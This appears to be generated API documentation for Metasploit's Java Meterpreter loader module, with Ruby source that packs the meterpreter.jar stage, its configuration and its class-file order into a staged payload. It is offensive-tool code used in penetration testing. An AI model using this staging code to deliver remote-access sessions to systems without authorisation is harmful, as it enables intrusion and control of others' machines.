Module: Msf::Payload::Java::MeterpreterLoader

Includes:
Msf::Payload::Java, UUID::Options, Sessions::MeterpreterOptions
Defined in:
lib/msf/core/payload/java/meterpreter_loader.rb

Overview

Common module stub for Java payloads that make use of Meterpreter.

Constant Summary

Constants included from Sessions::MeterpreterOptions

Sessions::MeterpreterOptions::TIMEOUT_COMMS, Sessions::MeterpreterOptions::TIMEOUT_RETRY_TOTAL, Sessions::MeterpreterOptions::TIMEOUT_RETRY_WAIT, Sessions::MeterpreterOptions::TIMEOUT_SESSION

Constants included from Rex::Payloads::Meterpreter::UriChecksum

Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN

Instance Method Summary collapse

Methods included from Sessions::MeterpreterOptions

#meterpreter_logging_config, #mettle_logging_config

Methods included from UUID::Options

#generate_payload_uuid, #generate_uri_uuid_mode, #record_payload_uuid, #record_payload_uuid_url

Methods included from Rex::Payloads::Meterpreter::UriChecksum

#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup

Methods included from Msf::Payload::Java

#class_files, #generate, #generate_axis2, #generate_default_stage, #generate_jar, #generate_stage, #generate_war

Instance Method Details

#generate_config(opts = {}) ⇒ Object



59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
# File 'lib/msf/core/payload/java/meterpreter_loader.rb', line 59

def generate_config(opts={})
  opts[:uuid] ||= generate_payload_uuid
  ds = opts[:datastore] || datastore

  # create the configuration block, which for staged connections is really simple.
  config_opts = {
    ascii_str:  true,
    arch:       opts[:uuid].arch,
    expiration: ds['SessionExpirationTimeout'].to_i,
    uuid:       opts[:uuid],
    transports: opts[:transport_config] || [transport_config(opts)],
    stageless:  opts[:stageless] == true
  }

  # create the configuration instance based off the parameters
  config = Rex::Payloads::Meterpreter::Config.new(config_opts)

  # return the binary version of it
  config.to_b
end

#initialize(info = {}) ⇒ Object



18
19
20
21
22
23
24
25
26
27
28
# File 'lib/msf/core/payload/java/meterpreter_loader.rb', line 18

def initialize(info = {})
  super(update_info(info,
    'Name'          => 'Java Meterpreter & Configuration',
    'Description'   => 'Java-specific meterpreter generation',
    'Author'        => ['OJ Reeves'],
    'Platform'      => 'java',
    'Arch'          => ARCH_JAVA,
    'PayloadCompat' => {'Convention' => 'http https'},
    'Stage'         => {'Payload' => ''}
    ))
end

#stage_class_filesObject



80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# File 'lib/msf/core/payload/java/meterpreter_loader.rb', line 80

def stage_class_files
  # Order matters.  Classes can only reference classes that have already
  # been sent.  The last .class must implement Stage, i.e. have a start()
  # method.
  #
  # The Meterpreter.class stage is just a jar loader, not really anything
  # to do with meterpreter specifically.  This payload should eventually
  # be replaced with an actual meterpreter stage so we don't have to send
  # a second jar.
  [
    [ "javapayload", "stage", "Stage.class" ],
    [ "com", "metasploit", "meterpreter", "JarFileClassLoader.class" ],
    # Must be last!
    [ "javapayload", "stage", "Meterpreter.class" ],
  ]
end

#stage_meterpreter(opts = {}) ⇒ Object

Override the Payload::Java version so we can load a prebuilt jar to be used as the final stage; calls super to get the intermediate stager.



38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# File 'lib/msf/core/payload/java/meterpreter_loader.rb', line 38

def stage_meterpreter(opts={})
  met = MetasploitPayloads.read('meterpreter', 'meterpreter.jar')
  config = generate_config(opts)

  # All of the dependencies to create a jar loader, followed by the length
  # of the jar and the jar itself, then the config
  blocks = [
    generate_default_stage(opts),
    [met.length, met].pack('NA*'),
    [config.length, config].pack('NA*')
  ]

  # Deliberate off by 1 here. The call to super adds a null terminator
  # so we would add 1 for the null terminate and remove one for the call
  # to super.
  block_count = blocks.length + stage_class_files.length

  # Pack all the magic together
  (blocks + [block_count]).pack('A*' * blocks.length + 'N')
end

#stage_payload(opts = {}) ⇒ Object



30
31
32
# File 'lib/msf/core/payload/java/meterpreter_loader.rb', line 30

def stage_payload(opts={})
  stage_meterpreter(opts)
end